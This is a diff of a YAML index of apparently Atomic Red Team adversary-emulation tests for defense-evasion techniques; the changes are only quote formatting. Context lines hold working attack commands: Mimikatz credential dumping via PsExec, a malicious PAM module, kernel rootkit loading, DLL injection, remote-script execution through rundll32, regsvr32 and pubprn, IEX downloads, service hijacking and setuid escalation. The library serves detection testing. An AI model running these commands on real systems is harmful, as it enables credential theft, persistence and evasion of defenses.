@@ -35891,19 +35891,19 @@ defense-evasion:
dependencies:
- description: 'Rubeus must exist on disk at specified location (#{rubeus_path})
-'
+ '
prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path}
-'
+ '
- description: 'PsExec must exist on disk at specified location (#{psexec_path})
-'
+ '
prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -35986,7 +35986,7 @@ defense-evasion:
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35999,14 +35999,14 @@ defense-evasion:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
-'
+ '
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
-'
+ '
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -36428,10 +36428,10 @@ defense-evasion:
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
@@ -36465,35 +36465,35 @@ defense-evasion:
- description: 'The PAM development library must be installed to build the PAM
module
-'
+ '
prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
0; else exit 1; fi;
-'
+ '
get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
fi
-'
+ '
- description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
-'
+ '
prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
-'
+ '
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
T1205.001:
technique:
object_marking_refs:
@@ -36932,13 +36932,13 @@ defense-evasion:
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
Ignore
-'
+ '
name: powershell
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -36950,7 +36950,7 @@ defense-evasion:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -36961,7 +36961,7 @@ defense-evasion:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -37085,7 +37085,7 @@ defense-evasion:
dependencies:
- description: 'The 64-bit version of Microsoft Office must be installed
-'
+ '
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
@@ -37096,7 +37096,7 @@ defense-evasion:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -37131,7 +37131,7 @@ defense-evasion:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -37146,10 +37146,10 @@ defense-evasion:
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_path})
-'
+ '
prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
@@ -37160,7 +37160,7 @@ defense-evasion:
command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa
/inject /id:500" "exit"
-'
+ '
name: command_prompt
elevation_required: false
T1055.008:
@@ -37306,7 +37306,7 @@ defense-evasion:
description: 'Executes the signed PubPrn.vbs script with options to download
and execute an arbitrary payload.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -37318,7 +37318,7 @@ defense-evasion:
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
localhost "script:#{remote_payload}"
-'
+ '
name: command_prompt
T1542.004:
technique:
@@ -37631,7 +37631,7 @@ defense-evasion:
description: 'Executes the Uninstall Method, No Admin Rights Required. Upon
execution, "I shouldn''t really execute either." will be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -37648,10 +37648,10 @@ defense-evasion:
- description: 'The CSharp source file must exist on disk at specified location
(#{source_file})
-'
+ '
prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}"
@@ -37661,7 +37661,7 @@ defense-evasion:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
cleanup_command: 'del #{output_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Regsvcs Uninstall Method Call Test
auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126
@@ -37684,10 +37684,10 @@ defense-evasion:
- description: 'The CSharp source file must exist on disk at specified location
(#{source_file})
-'
+ '
prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}"
@@ -37776,7 +37776,7 @@ defense-evasion:
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls. Upon execution, calc.exe will be launched.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -37796,10 +37796,10 @@ defense-evasion:
dependencies:
- description: 'Regsvr32.sct must exist on disk at specified location (#{filename})
-'
+ '
prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#{filename}"
@@ -37834,7 +37834,7 @@ defense-evasion:
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls. Upon execution, calc.exe will be launched.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -37855,10 +37855,10 @@ defense-evasion:
- description: 'AllTheThingsx86.dll must exist on disk at specified location
(#{dll_name})
-'
+ '
prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
@@ -37866,14 +37866,14 @@ defense-evasion:
command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
/s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} )
-'
+ '
name: command_prompt
- name: Regsvr32 Registering Non DLL
auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421
description: 'Replicating observed Gozi maldoc behavior registering a dll with
an altered extension
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -37893,13 +37893,13 @@ defense-evasion:
dependencies:
- description: 'Test requires a renamed dll file
-'
+ '
prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 )
-'
+ '
get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
-'
+ '
executor:
name: command_prompt
elevation_required: false
@@ -38015,7 +38015,7 @@ defense-evasion:
%SystemRoot%\Temp\lsass.exe /B
cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
-'
+ '
name: command_prompt
- name: Masquerading as Linux crond process.
auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556
@@ -38031,7 +38031,7 @@ defense-evasion:
echo 'sleep 5' | /tmp/crond
cleanup_command: 'rm /tmp/crond
-'
+ '
name: sh
- name: Masquerading - cscript.exe running as notepad.exe
auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0
@@ -38047,7 +38047,7 @@ defense-evasion:
cmd.exe /c %APPDATA%\notepad.exe /B
cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1
-'
+ '
name: command_prompt
- name: Masquerading - wscript.exe running as svchost.exe
auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23
@@ -38063,7 +38063,7 @@ defense-evasion:
cmd.exe /c %APPDATA%\svchost.exe /B
cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
-'
+ '
name: command_prompt
- name: Masquerading - powershell.exe running as taskhostw.exe
auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
@@ -38079,7 +38079,7 @@ defense-evasion:
cmd.exe /K %APPDATA%\taskhostw.exe
cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
-'
+ '
name: command_prompt
- name: Masquerading - non-windows exe running as windows exe
auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086
@@ -38102,10 +38102,10 @@ defense-evasion:
dependencies:
- description: 'Exe file to copy must exist on disk at specified location (#{inputfile})
-'
+ '
prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}"
@@ -38116,14 +38116,14 @@ defense-evasion:
Stop-Process -ID $myT1036_003
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Masquerading - windows exe running as different windows exe
auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0
description: 'Copies a windows exe, renames it as another windows exe, and launches
it to masquerade as second windows exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -38142,7 +38142,7 @@ defense-evasion:
Stop-Process -ID $myT1036_003
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Malicious process Masquerading as LSM.exe
auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
@@ -38486,7 +38486,7 @@ defense-evasion:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -38500,10 +38500,10 @@ defense-evasion:
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_path})
-'
+ '
prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -38536,7 +38536,7 @@ defense-evasion:
Write-Host "End of DCShadow"
cleanup_command: 'Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore
-'
+ '
T1014:
technique:
object_marking_refs:
@@ -38614,7 +38614,7 @@ defense-evasion:
auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553
description: 'Loadable Kernel Module based Rootkit
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -38634,11 +38634,11 @@ defense-evasion:
dependencies:
- description: 'The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
-'
+ '
prereq_command: 'if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0;
else exit 1; fi;
-'
+ '
get_prereq_command: |
sudo apt install make
sudo apt install gcc
@@ -38651,7 +38651,7 @@ defense-evasion:
executor:
command: 'sudo insmod #{rootkit_path}/#{rootkit_name}.ko
-'
+ '
cleanup_command: |
sudo rmmod #{rootkit_name}
sudo rm -rf #{rootkit_path}
@@ -38661,7 +38661,7 @@ defense-evasion:
auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f
description: 'Loadable Kernel Module based Rootkit
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -38681,11 +38681,11 @@ defense-evasion:
dependencies:
- description: 'The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
-'
+ '
prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then
exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: "sudo apt install make\nsudo apt install gcc\nif [ ! -d
/tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;\ncp
#{rootkit_source_path}/* /tmp/T1014\ncd /tmp/T1014; make \nsudo cp
@@ -38694,7 +38694,7 @@ defense-evasion:
executor:
command: 'sudo modprobe #{rootkit_name}
-'
+ '
cleanup_command: |
sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
@@ -38797,32 +38797,32 @@ defense-evasion:
dependencies:
- description: 'MSI file must exist on disk at specified location (#{msi_file_path})
-'
+ '
prereq_command: 'if (Test-Path #{msi_file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{msi_file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}"
- description: 'CAB file must exist on disk at specified location (#{cab_file_path})
-'
+ '
prereq_command: 'if (Test-Path #{cab_file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: "New-Item -Type Directory (split-path #{cab_file_path})
-ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab\"
-OutFile \"#{cab_file_path}\" \n"
- description: 'Old version of Virtualbox must be installed
-'
+ '
prereq_command: 'if (Test-Path "C:\Program Files\Oracle\VirtualBox\VboxC.dll")
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'msiexec /i #{msi_file_path} /qn
-'
+ '
executor:
command: |
"C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe" /reregserver
@@ -38873,20 +38873,20 @@ defense-evasion:
dependencies:
- description: 'VirtualBox must exist on disk at specified locations (#{virtualbox_exe})
-'
+ '
prereq_command: 'if (Test-Path "#{virtualbox_exe}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
$wc = New-Object System.Net.WebClient
$wc.DownloadFile("#{virtualbox_download}","$env:TEMP\#{virtualbox_installer}")
start-process -FilePath "$env:TEMP\#{virtualbox_installer}" -ArgumentList "--silent" -Wait
- description: 'VBoxManage must exist on disk at specified locations (#{vboxmanage_exe})
-'
+ '
prereq_command: 'if (Test-Path "#{vboxmanage_exe}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
$wc = New-Object System.Net.WebClient
$wc.DownloadFile("#{virtualbox_download}","$env:TEMP\#{virtualbox_installer}")
@@ -38923,11 +38923,11 @@ defense-evasion:
prereq_command: 'if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State
= "Enabled") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V
-All -Force
-'
+ '
executor:
name: powershell
elevation_required: true
@@ -39010,7 +39010,7 @@ defense-evasion:
description: 'Test execution of a remote script using rundll32.exe. Upon execution
notepad.exe will be opened.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -39021,7 +39021,7 @@ defense-evasion:
executor:
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
-'
+ '
name: command_prompt
- name: Rundll32 execute VBscript command
auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
@@ -39039,7 +39039,7 @@ defense-evasion:
executor:
command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
-'
+ '
name: command_prompt
- name: Rundll32 advpack.dll Execution
auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89
@@ -39058,17 +39058,17 @@ defense-evasion:
dependencies:
- description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
-'
+ '
prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
executor:
command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
-'
+ '
name: command_prompt
- name: Rundll32 ieadvpack.dll Execution
auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9
@@ -39088,17 +39088,17 @@ defense-evasion:
dependencies:
- description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
-'
+ '
prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
executor:
command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
-'
+ '
name: command_prompt
- name: Rundll32 syssetup.dll Execution
auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125
@@ -39117,10 +39117,10 @@ defense-evasion:
dependencies:
- description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
-'
+ '
prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
@@ -39128,7 +39128,7 @@ defense-evasion:
command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
128 .\#{inf_to_execute}
-'
+ '
name: command_prompt
- name: Rundll32 setupapi.dll Execution
auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19
@@ -39147,10 +39147,10 @@ defense-evasion:
dependencies:
- description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
-'
+ '
prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
@@ -39158,7 +39158,7 @@ defense-evasion:
command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
.\#{inf_to_execute}
-'
+ '
name: command_prompt
- name: Execution of HTA and VBS Files using Rundll32 and URL.dll
auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3
@@ -39181,7 +39181,7 @@ defense-evasion:
description: 'Executes the LaunchApplication function in pcwutl.dll to proxy
execution of an executable.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -39192,7 +39192,7 @@ defense-evasion:
executor:
command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
-'
+ '
name: command_prompt
- name: Execution of non-dll using rundll32.exe
auto_generated_guid: ae3a8605-b26e-457c-b6b3-2702fd335bac
@@ -39212,18 +39212,18 @@ defense-evasion:
dependencies:
- description: 'Non-dll file must exist on disk at specified location
-'
+ '
prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-'
+ '
executor:
name: powershell
command: 'rundll32.exe #{input_file}, StartW
-'
+ '
- name: Rundll32 with Ordinal Value
auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
description: "Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer.
@@ -39243,18 +39243,18 @@ defense-evasion:
dependencies:
- description: 'DLL file must exist on disk at specified location
-'
+ '
prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-'
+ '
executor:
name: command_prompt
command: 'rundll32.exe #{input_file},#2
-'
+ '
- name: Rundll32 with Control_RunDLL
auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e
description: "Rundll32.exe loading dll with 'control_rundll' within the command-line,
@@ -39274,18 +39274,18 @@ defense-evasion:
dependencies:
- description: 'DLL file must exist on disk at specified location
-'
+ '
prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-'
+ '
executor:
name: command_prompt
command: 'rundll32.exe shell32.dll,Control_RunDLL #{input_file}
-'
+ '
T1134.005:
technique:
object_marking_refs:
@@ -39761,7 +39761,7 @@ defense-evasion:
description: 'Change Service registry ImagePath of a bengin service to a malicious
file
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -39781,22 +39781,22 @@ defense-evasion:
dependencies:
- description: 'The service must exist (#{weak_service_name})
-'
+ '
prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
-'
+ '
executor:
command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
/f /v ImagePath /d "#{malicious_service_path}"
-'
+ '
cleanup_command: 'sc.exe delete #{weak_service_name}
-'
+ '
name: command_prompt
T1548.001:
technique:
@@ -39852,7 +39852,7 @@ defense-evasion:
description: 'Make, change owner, and change file attributes on a C source code
file
-'
+ '
supported_platforms:
- macos
- linux
@@ -39878,7 +39878,7 @@ defense-evasion:
auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
description: 'This test sets the SetUID flag on a file in Linux and macOS.
-'
+ '
supported_platforms:
- macos
- linux
@@ -39894,14 +39894,14 @@ defense-evasion:
sudo chmod u+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
-'
+ '
name: sh
elevation_required: true
- name: Set a SetGID flag on file
auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
description: 'This test sets the SetGID flag on a file in Linux and macOS.
-'
+ '
supported_platforms:
- macos
- linux
@@ -39917,7 +39917,7 @@ defense-evasion:
sudo chmod g+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
-'
+ '
name: sh
elevation_required: true
- name: Make and modify capabilities of a binary
@@ -39949,7 +39949,7 @@ defense-evasion:
description: 'This test gives a file the capability to set UID without using
flags.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -39963,7 +39963,7 @@ defense-evasion:
sudo setcap cap_setuid=ep #{file_to_setcap}
cleanup_command: 'rm #{file_to_setcap}
-'
+ '
name: sh
elevation_required: true
T1218:
@@ -40022,7 +40022,7 @@ defense-evasion:
description: 'Injects arbitrary DLL into running process specified by process
ID. Requires Windows 10.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40038,17 +40038,17 @@ defense-evasion:
dependencies:
- description: 'T1218.dll must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
executor:
command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
-'
+ '
name: command_prompt
elevation_required: true
- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
@@ -40056,7 +40056,7 @@ defense-evasion:
description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
Requires Windows 10.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40067,14 +40067,14 @@ defense-evasion:
executor:
command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
-'
+ '
name: command_prompt
- name: Register-CimProvider - Execute evil dll
auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655
description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
note this dll can be served up via SMB
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40086,17 +40086,17 @@ defense-evasion:
dependencies:
- description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
executor:
command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
-'
+ '
name: command_prompt
- name: InfDefaultInstall.exe .inf Execution
auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef
@@ -40115,17 +40115,17 @@ defense-evasion:
dependencies:
- description: 'INF file must exist on disk at specified location (#{inf_to_execute})
-'
+ '
prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
executor:
command: 'InfDefaultInstall.exe #{inf_to_execute}
-'
+ '
name: command_prompt
- name: ProtocolHandler.exe Downloaded a Suspicious File
auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2
@@ -40133,7 +40133,7 @@ defense-evasion:
Office. On successful execution you should see Microsoft Word launch a blank
file.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40146,15 +40146,15 @@ defense-evasion:
- description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe
must be provided
-'
+ '
prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft
Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'write-host "Install Microsoft Word or provide correct
path."
-'
+ '
executor:
name: command_prompt
elevation_required: false
@@ -40166,7 +40166,7 @@ defense-evasion:
description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a
.Net assembly that launches calc.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40188,15 +40188,15 @@ defense-evasion:
prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'write-host ".Net must be installed for this test to work
correctly."
-'
+ '
executor:
command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt
-'
+ '
name: powershell
elevation_required: false
- name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions
@@ -40204,7 +40204,7 @@ defense-evasion:
description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe
running a .Net assembly that launches calc.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40233,7 +40233,7 @@ defense-evasion:
get_prereq_command: 'write-host "you need to rename workflow complier before
you run this test"
-'
+ '
executor:
command: "#{renamed_binary} #{xml_payload} output.txt\n"
name: powershell
@@ -40276,7 +40276,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name}
-ModulePath #{module_path}'
@@ -40286,7 +40286,7 @@ defense-evasion:
